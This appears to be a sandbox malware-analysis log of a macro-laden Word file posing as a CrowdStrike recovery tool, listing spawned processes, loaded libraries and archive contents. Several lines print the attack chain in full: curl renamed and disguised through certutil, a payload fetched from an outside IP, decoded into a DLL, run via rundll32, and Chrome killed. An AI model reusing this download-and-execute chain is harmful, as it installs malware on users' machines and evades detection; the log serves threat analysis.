Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe

Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: Templates.LNK.0.dr	LNK file: ..\..\Templates
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.dr	LNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = docProps/custom.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/itemProps3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/item3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/media/image2.jpg
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/media/image10.jpeg
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.26.dr	Initial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0000.tmp.26.dr	Initial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0000.tmp.26.dr	Initial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0000.tmp.26.dr	Initial sample: OLE zip file path = docProps/custom.xml

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source:	Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
